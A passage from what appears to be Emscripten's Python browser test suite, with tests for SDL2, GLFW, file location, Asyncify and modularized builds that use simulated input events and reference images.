self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget.c'), args=['-sASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-sASYNCIFY'])
@parameterized({
'': ([],),
'es6': (['-sEXPORT_ES6=1'],),
})
def test_locate_file(self, args):
self.set_setting('EXIT_RUNTIME')
for wasm in [0, 1]:
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
shutil.move('test.data', Path('sub/test.data'))
self.run_browser('page.html', None, '/report_result?exit:0')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-sSAFE_HEAP', '-sASSERTIONS', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
self.run_browser('page.html', None, '/report_result?exit:' + expected)
in_html('0')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
return result;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-sLEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-sUSE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
// send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-sUSE_SDL=2', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-sUSE_PTHREADS', '-sUSE_SDL=2', '-sPROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '--closure=1', '-g1', '-sLEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '-sLEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-sUSE_SDL=2', '-sUSE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-sUSE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-sUSE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-sUSE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-sUSE_SDL=2', '-sINITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-sUSE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-sGL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-sUSE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-sUSE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-sUSE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_glalphatest(self):
self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-sUSE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = read_file('test.html')
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-sGL_TESTING', '-sUSE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-sUSE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2'])
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2', '-sMAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-sUSE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-sEXIT_RUNTIME', '-sUSE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-sUSE_SDL=2', '-sUSE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-sINITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
# TODO: need to source freepats.cfg and a midi file
# 'mid': (['mid'], 'MIX_INIT_MID', 'midi.mid'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-sUSE_SDL=2',
'-sUSE_SDL_MIXER=2',
'-sSDL2_MIXER_FORMATS=' + json.dumps(formats),
'-sINITIAL_MEMORY=33554432'
])
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-sUSE_COCOS2D=3', '-sERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-sASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-sASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-sASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest_exit('browser/async.cpp', args=['-sASYNCIFY', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-sASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-sASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-sASSERTIONS', '-sSAFE_HEAP', '-profiling', '-sASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest_exit('browser/async_longjmp.cpp', args=args + ['-sASYNCIFY'])
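# Hedged sketch (not part of the suite) of the situation the comment above describes: an
# Asyncify sleep inside code reached from a setjmp region, where calls are routed through
# invoke_* wrappers. The file name and flags here are illustrative assumptions.
def _sketch_async_sleep_with_longjmp(self):
  create_file('sleep_longjmp.c', r'''
    #include <emscripten.h>
    #include <setjmp.h>
    #include <stdio.h>
    static jmp_buf env;
    static void sleeper(void) {
      emscripten_sleep(1);  // asynchronous pause while inside the setjmp region
      longjmp(env, 1);
    }
    int main() {
      if (!setjmp(env)) {
        sleeper();
      } else {
        printf("returned via longjmp after an async sleep\n");
      }
      return 0;
    }
  ''')
  self.btest_exit('sleep_longjmp.c', args=['-sASYNCIFY'])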
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-sASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-sASSERTIONS', '-sDISABLE_EXCEPTION_CATCHING=0', '-profiling', '-sSAFE_HEAP', '-lSDL', '-sASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-sASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-sASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-sASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-sASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
'response': (['-sASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-sASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
self.btest('browser/async_returnvalue.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-sASSERTIONS'])
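# Hedged sketch (not part of the suite) of what "a custom JS library method that uses asyncify"
# above can look like: the library function suspends via Asyncify.handleSleep and passes its
# result to wakeUp(), so it must be listed in ASYNCIFY_IMPORTS. All names here (sleepy.js,
# sleep_then_return) are hypothetical.
def _sketch_asyncify_js_import(self):
  create_file('sleepy.js', r'''
    mergeInto(LibraryManager.library, {
      sleep_then_return: function() {
        return Asyncify.handleSleep(function(wakeUp) {
          setTimeout(function() { wakeUp(42); }, 1);
        });
      }
    });
  ''')
  create_file('sleepy.c', r'''
    #include <assert.h>
    extern int sleep_then_return(void);
    int main() {
      assert(sleep_then_return() == 42);
      return 0;
    }
  ''')
  self.btest_exit('sleepy.c', args=['-sASYNCIFY', '-sASYNCIFY_IMPORTS=[sleep_then_return]',
                                    '--js-library', 'sleepy.js'])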
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-sASYNCIFY', '-sASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sMODULARIZE as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sMODULARIZE', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sEXPORT_NAME=Foo as well.
def test_minimal_runtime_export_name(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sEXPORT_NAME=Foo', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-sEXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-sEXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-sEXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-sMODULARIZE', '-sSINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message);
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
